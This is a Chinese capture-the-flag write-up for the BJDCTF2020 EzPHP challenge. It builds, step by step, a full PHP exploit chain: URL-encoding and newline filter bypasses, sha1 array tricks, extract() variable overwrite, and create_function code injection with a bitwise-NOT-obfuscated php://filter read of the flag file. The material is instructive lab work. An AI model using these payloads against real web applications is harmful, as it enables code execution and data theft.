当前位置：首页 > news >正文

[BJDCTF2020]EzPHP 许多的特性

news 2025/12/26 19:26:40

这道题可以学到很多东西静下心来慢慢通过本地知道是干嘛用的就可以学会了

BJDctf2020 Ezphp_[bjdctf2020]ezphp-CSDN博客

这里开始

一部分一部分看

$_SERVER['QUERY_SRING']的漏洞

if($_SERVER) { if (preg_match('/shana|debu|aqua|cute|arg|code|flag|system|exec|passwd|ass|eval|sort|shell|ob|start|mail|\$|sou|show|cont|high|reverse|flip|rand|scan|chr|local|sess|id|source|arra|head|light|read|inc|info|bin|hex|oct|echo|print|pi|\.|\"|\'|log/i', $_SERVER['QUERY_STRING']))  // print_r($_SERVER['QUERY_STRING']);die('You seem to want to do something bad?'); 
}

这里是出现这些内容我们就报错

这里使用url编码绕过

$_SERVER['QUERY_STRING']函数不对传入的东西进行url编码

所以我们传入什么就是什么但是最后到服务端还是会解码

然后我们看下面

绕过preg_match %0a

if (!preg_match('/http|https/i', $_GET['file'])) {if (preg_match('/^aqua_is_cute$/', $_GET['debu']) && $_GET['debu'] !== 'aqua_is_cute') { $file = $_GET["file"]; echo "Neeeeee! Good Job!<br>";} 
} else die('fxck you! What do you want to do ?!');

这里首先file不能使用http 然后需要debu传入 aqua_is_cute 但是不能等于

这里很简单使用 %0a绕过即可

所以目前的payload

?deb%75=aq%75a_is_c%75te%0a这里是因为上面的绕过 所以需要url编码

继续

$_REQUEST 特性 post比get先接受参数

if($_REQUEST) { foreach($_REQUEST as $value) { if(preg_match('/[a-zA-Z]/i', $value))  die('fxck you! I hate English!'); } 
}

这里是$_REQUEST 的特性这里会判断是不是有字母在 $_REQUEST 中

但是我们通过post传递和get传递的时候 POST会被先接受然后没有字母就绕过

所以现在是

GET?deb%75=aq%75a_is_c%75te%0aPOST debu=1

伪协议data伪造

if (file_get_contents($file) !== 'debu_debu_aqua')die("Aqua is the cutest five-year-old child in the world! Isn't it ?<br>");

这里很简单了

GET?deb%75=aq%75a_is_c%75te%0a&file=data://text/plain,deb%75_deb%75_aq%75aPOST debu=1&file=2

sha1 === 数组绕过

if ( sha1($shana) === sha1($passwd) && $shana != $passwd ){extract($_GET["flag"]);echo "Very good! you know my password. But what is flag?<br>";
} else{die("fxck you! you don't know my password! And you don't know sha1! why you come here!");
}

没有is_string的判断不需要碰撞数组绕过即可

GET?deb%75=aq%75a_is_c%75te%0a&file=data://text/plain,deb%75_deb%75_aq%75a&shan%61[]=1&p%61sswd[]=2POST debu=1&file=2   //其他不需要是因为我们没有传入字母了

create_function代码注入

if(preg_match('/^[a-z0-9]*$/isD', $code) || 
preg_match('/fil|cat|more|tail|tac|less|head|nl|tailf|ass|eval|sort|shell|ob|start|mail|\`|\{|\%|x|\&|\$|\*|\||\<|\"|\'|\=|\?|sou|show|cont|high|reverse|flip|rand|scan|chr|local|sess|id|source|arra|head|light|print|echo|read|inc|flag|1f|info|bin|hex|oct|pi|con|rot|input|\.|log|\^/i', $arg) ) { die("<br />Neeeeee~! I have disabled all dangerous functions! You can't get my flag =w="); 
} else { include "flag.php";$code('', $arg); 
} ?>

这个也是最难的

首先我们知道create_funtion的代码是什么

$aaa = create_function('$a, $b', 'return $a+$b;');和function aaa($a,$b){return $a+$b
}一样但是这里注意 我们现在的arg 其实就是 return $a+$b 并且是可控的 如果我们闭合 代码注入呢$aaa = create_function('$a, $b', 'return $a+$b;}想执行的函数()');//就变为了function aaa($a,$b){return $a+$b;}
想执行的函数();//
}美化一下function aaa($a,$b){return $a+$b;
}
想执行的函数();      //}这里我们不就实现了代码注入

这里我们就已经知道这道题如何实现了

这里有个问题我们如何输出呢

这里还要注意上面的

extract($_GET["flag"]) 变量覆盖

 
extract($_GET["flag"])举例子?flag[name]=John&flag[age]=30，那么调用 extract($_GET["flag"]); 将会创建两个变量 $name 和 $age，并将它们的值分别设置为 "John" 和 30。

所以这里我们可以将flag通过flag来设定值

这样我们可以绕过上面的数字字母过滤 preg_match 不会匹配到

所以我们可以构造payload

fl%61ag[co%64e]=create_function&fl%61ag[%61rg]=;}();//

所以现在的payload

GET?deb%75=aq%75a_is_c%75te%0a&file=data://text/plain,deb%75_deb%75_aq%75a&shan%61[]=1&p%61sswd[]=2&fl%61g[co%64e]=create_function&fl%61g[%61rg]=};//POST debu=1&file=2   //其他不需要是因为我们没有传入字母了

然后这里我们无法获取到内容所以我们通过 get_defined_vars() 输出页面中的所有变量

var_dump(get_defined_vars())输出页面所有变量

GET?deb%75=aq%75a_is_c%75te%0a&file=data://text/plain,deb%75_deb%75_aq%75a&shan%61[]=1&p%61sswd[]=2&fl%61g[co%64e]=create_function&fl%61g[%61rg]=}var_dump(get_defined_vars());//POST debu=1&file=2   //其他不需要是因为我们没有传入字母了

去访问

直接读取源代码

通过文件包含和伪协议实现读取

require(php://filter/read=convert.base64-encode/resource=rea1fl4g.php);然后这里过滤了很多我们可以和无回显rce一样 取反操作实现}require(~(%8F%97%8F%C5%D0%D0%99%96%93%8B%9A%8D%D0%8D%9A%9E%9B%C2%9C%90%91%89%9A%8D%8B%D1%9D%9E%8C%9A%C9%CB%D2%9A%91%9C%90%9B%9A%D0%8D%9A%8C%90%8A%8D%9C%9A%C2%8D%9A%9E%CE%99%93%CB%98%D1%8F%97%8F));//

所以最后的payload

GET?deb%75=aq%75a_is_c%75te%0a&file=data://text/plain,deb%75_deb%75_aq%75a&shan%61[]=1&p%61sswd[]=2&fl%61g[co%64e]=create_function&fl%61g[%61rg]=
}require(~(%8F%97%8F%C5%D0%D0%99%96%93%8B%9A%8D%D0%8D%9A%9E%9B%C2%9C%90%91%89%9A%8D%8B%D1%9D%9E%8C%9A%C9%CB%D2%9A%91%9C%90%9B%9A%D0%8D%9A%8C%90%8A%8D%9C%9A%C2%8D%9A%9E%CE%99%93%CB%98%D1%8F%97%8F));//POST debu=1&file=2   //其他不需要是因为我们没有传入字母了

然后可以发现获取到了flag

[BJDCTF2020]EzPHP 许多的特性

这道题可以学到很多东西静下心来慢慢通过本地知道是干嘛用的就可以学会了 BJDctf2020 Ezphp_[bjdctf2020]ezphp-CSDN博客这里开始一部分一部分看 $_SERVER[QUERY_SRING]的漏洞 if($_SERVER) { if (preg_match(/shana|debu|aqua|cute|arg|code|flag|system|exec|passwd|…...

编程日记 2023/12/12 5:08:17

Ubuntu开机出现Welcome to emergency mode解决办法

问题描述笔记本电脑安装了windows 10和ubuntu 16.04双系统，windows系统关机时按电源键强制关机，再次开机进入Ubuntu系统时无法进入图形界面，出现Welcome to emergency mode。问题分析异常关机导致文件系统受损，依据提示使用…...

编程日记 2023/12/12 5:04:14

Android 7.1 默认自拍镜像

Android 7.1 默认自拍镜像近来收到客户需求反馈需要将相机前摄成像默认为镜像显示，大致思路我们可以在保存数据前将前摄拍的照片转为镜像，保存数据是通过PhotoMode.java文件中的saveData方法实现，具体修改参照如下： 首先添加将图…...

编程日记 2023/12/12 5:02:11

设计模式（二）-创建者模式（5）-建造者模式

一、为何需要建造者模式（Builder）? 在软件系统中，会存在一个复杂的对象，复杂在于该对象包含了很多不同的功能模块。该对象里的各个部分都是按照一定的算法组合起来的。为了要使得复杂对象里的各个部分的独立性，以及…...

编程日记 2023/12/12 5:01:10

学习使用三个命令实现在腾讯云服务器TencentOS Server 3.1或者CentOS 8上安装ffmpeg

学习使用三个命令实现在腾讯云服务器TencentOS Server 3.1或者CentOS 8上安装ffmpeg Error: Unable to find a match: ffmpeg添加RPMfusion仓库安装SDL安装ffmpeg执行命令测试 Error: Unable to find a match: ffmpeg 添加RPMfusion仓库 yum install https://download1.rpmfus…...

编程日记 2023/12/12 4:59:07

Java 22种设计模式详解

22种设计模式详解创建型模式单例模式工厂方法模式抽象工厂模式建造者模式原型模式结构型模式适配器模式桥接模式组合模式装饰器模式代理模式外观模式享元模式享元模式原理：享元模式角色：示例代码： 行为型模式模板方法模式原理角色示例代码命…...

编程日记 2023/12/12 4:58:05

代码随想录算法训练营第四十八天 _ 动态规划_198.打家劫舍、213.打家劫舍II、337.打家劫舍 III。

学习目标： 动态规划五部曲： ① 确定dp[i]的含义 ② 求递推公式 ③ dp数组如何初始化 ④ 确定遍历顺序 ⑤ 打印递归数组 ---- 调试引用自代码随想录！ 60天训练营打卡计划！ 学习内容： 198.打家劫舍动态规划五步曲&a…...

编程日记 2023/12/12 4:55:03

记录一下快速上手Springboot登录注册项目

本教程需要安装以下工具，如果不清楚怎么安装的可以看下我的这篇文章链接: https://blog.csdn.net/qq_30627241/article/details/134804675 管理工具： maven IDE： IDEA 数据库： MySQL 测试工具： Postman 打开IDE…...

编程日记 2023/12/12 4:52:00

【LVGL】STM32F429IGT6（在野火官网的LCD例程上）移植LVGL官方的例程（还没写完，有问题排查中）

这里写目录标题前言一、本次实验准备1、硬件2、软件二、移植LVGL代码1、获取LVGL官方源码2、整理一下，下载后的源码文件3、开始移植三、移植显示驱动1、enable LVGL2、修改报错部分3、修改lv_config4、修改lv_port_disp.c文件到此步遇到的问题 Undefined symbol …...

编程日记 2023/12/12 4:50:59

Vue学习笔记-Vue3中ref和reactive函数的使用

前言为了让vue3中的数据变成响应式，需要使用ref,reactive函数 ref函数使用方式导入ref函数 import {ref} from vue在setup函数中，将需要响应式的数据通过ref函数进行包装，修改响应式数据时，需要通过: ref包装的响应式对象.val…...

编程日记 2023/12/12 4:49:58

大数据分析与应用实验任务十一

大数据分析与应用实验任务十一实验目的通过实验掌握spark Streaming相关对象的创建方法； 熟悉spark Streaming对文件流、套接字流和RDD队列流的数据接收处理方法； 熟悉spark Streaming的转换操作，包括无状态和有状态转换。熟悉spark S…...

编程日记 2023/12/12 4:48:56

“78Win-Vận mệnh tốt”Trang web hỗ trợ kỹ thuật

Chng ti l một phần mềm cung cấp dịch vụ mua hộ xổ số cho người Việt Nam gốc Hoa. Bạn c thể gửi số v số lượng v số cần mua hộ, chng ti sẽ gửi đến tay bạn trước khi mở giải thưởng. Bạn chỉ cần trả tiền offline. Nếu bạ…...

编程日记 2023/12/12 4:44:53

React中使用react-json-view展示JSON数据

文章目录一、前言1.1、在线demo1.2、Github仓库二、实践2.1、安装react-json-view2.2、组件封装2.3、效果2.4、参数详解2.4.1、src(必须) ：JSON Object2.4.2、name：string或false2.4.3、theme：string2.4.4、style：object2.4.5、…...

编程日记 2023/12/12 4:43:51

一文简述“低代码开发平台”到底是什么？

低代码开发平台到底是什么？ 低代码开发平台（英文全称Low-Code Development Platform）是一种基于图形界面、可视化编程技术的开发平台，旨在提高软件开发的效率和质量。它可以帮助开发者快速构建应用程序，减少手动编写代…...

编程日记 2023/12/12 4:41:50

HNU计算机体系结构-实验3：多cache一致性算法

文章目录实验3 多cache一致性算法一、实验目的二、实验说明三实验内容1、cache一致性算法-监听法模拟2、cache一致性算法-目录法模拟四、思考题五、实验总结实验3 多cache一致性算法一、实验目的熟悉cache一致性模拟器（监听法和目录法）的使用&am…...

编程日记 2023/12/12 4:38:48

Go语言学习路线规划

🌷🍁 博主猫头虎（🐅🐾）带您 Go to New World✨🍁 🦄 博客首页——🐅🐾猫头虎的博客🎐 🐳 《面试题大全专栏》 🦕 文章图文…...

编程日记 2023/12/12 4:37:46

微软NativeApi-NtQuerySystemInformation

微软有一个比较实用的Native接口：NtQuerySystemInformation，具体可以参考微软msdn官方文档：NtQuerySystemInformation， 是一个系统函数，用于收集特定于所提供的指定种类的系统信息。ProcessHacker等工具使用NtQuerySys…...

编程日记 2023/12/12 4:32:41

灵活与高效的结合，CodeMeter Cloud Lite轻云锁解决方案

众多软件开发商日渐认识到，威步推出的一系列尖端软件产品在维护知识产权、精确控制及有效管理软件授权方面发挥着不可或缺的作用。这些产品的核心功能包括将许可证及其他关键敏感数据安全地存储于高端复杂的硬件设备、经过专业加密的文件，或者置于受严格…...

编程日记 2023/12/12 4:31:39

Flink 系列文章汇总索引

Flink 系列文章一、Flink 专栏本专栏系统介绍某一知识点，并辅以具体的示例进行说明。本专栏的文章编号可能不是顺序的，主要是因为写的时候顺序没统一，但相关的文章又引入了，所以后面就没有调整了，按照写文章的顺…...

编程日记 2023/12/12 4:30:38

计算机网络——期末考试复习资料

什么是计算机网络将地理位置不同的具有独立功能的多台计算机及其外部设备通过通信线路和通信设备连接起来；实现资源共享和数据传递的计算机的系统。三种交换方式报文交换：路由器转发报文； 电路交换：建立一对一电路分组交换&a…...

编程日记 2023/12/12 4:28:36

在鸿蒙HarmonyOS 5中实现抖音风格的点赞功能

下面我将详细介绍如何使用HarmonyOS SDK在HarmonyOS 5中实现类似抖音的点赞功能，包括动画效果、数据同步和交互优化。 1. 基础点赞功能实现 1.1 创建数据模型 // VideoModel.ets export class VideoModel {id: string "";title: string ""…...

编程新知 2025/11/14 9:31:35

【位运算】消失的两个数字（hard）

消失的两个数字（hard） 题⽬描述：解法（位运算）：Java 算法代码：更简便代码题⽬链接：⾯试题 17.19. 消失的两个数字题⽬描述： 给定⼀个数组，包含从 1 到 N 所有…...

编程新知 2025/11/15 16:18:24

关于nvm与node.js

1 安装nvm 安装过程中手动修改 nvm的安装路径， 以及修改通过nvm安装node后正在使用的node的存放目录【这句话可能难以理解，但接着往下看你就了然了】 2 修改nvm中settings.txt文件配置 nvm安装成功后，通常在该文件中会出现以下配置&…...

编程新知 2025/12/23 10:38:48

多模态商品数据接口：融合图像、语音与文字的下一代商品详情体验

一、多模态商品数据接口的技术架构 （一）多模态数据融合引擎跨模态语义对齐通过Transformer架构实现图像、语音、文字的语义关联。例如，当用户上传一张“蓝色连衣裙”的图片时，接口可自动提取图像中的颜色（RGB值&…...

编程新知 2025/7/23 3:55:49

【服务器压力测试】本地PC电脑作为服务器运行时出现卡顿和资源紧张（Windows/Linux）

要让本地PC电脑作为服务器运行时出现卡顿和资源紧张的情况，可以通过以下几种方式模拟或触发： 1. 增加CPU负载运行大量计算密集型任务，例如： 使用多线程循环执行复杂计算（如数学运算、加密解密等）。运行图…...

编程新知 2025/11/30 10:30:15

【VLNs篇】07：NavRL—在动态环境中学习安全飞行

项目内容论文标题NavRL: 在动态环境中学习安全飞行 (NavRL: Learning Safe Flight in Dynamic Environments)核心问题解决无人机在包含静态和动态障碍物的复杂环境中进行安全、高效自主导航的挑战，克服传统方法和现有强化学习方法的局限性。核心算法基于近端策略优化…...

编程新知 2025/12/15 16:22:57

适应性Java用于现代 API：REST、GraphQL 和事件驱动

在快速发展的软件开发领域，REST、GraphQL 和事件驱动架构等新的 API 标准对于构建可扩展、高效的系统至关重要。Java 在现代 API 方面以其在企业应用中的稳定性而闻名，不断适应这些现代范式的需求。随着不断发展的生态系统，Java 在现代 API 方…...

编程新知 2025/11/10 19:07:59

在 Spring Boot 项目里，MYSQL中json类型字段使用

前言： 因为程序特殊需求导致，需要mysql数据库存储json类型数据，因此记录一下使用流程 1.java实体中新增字段 private List<User> users 2.增加mybatis-plus注解 TableField(typeHandler FastjsonTypeHandler.class) private Lis…...

编程新知 2025/7/9 16:55:37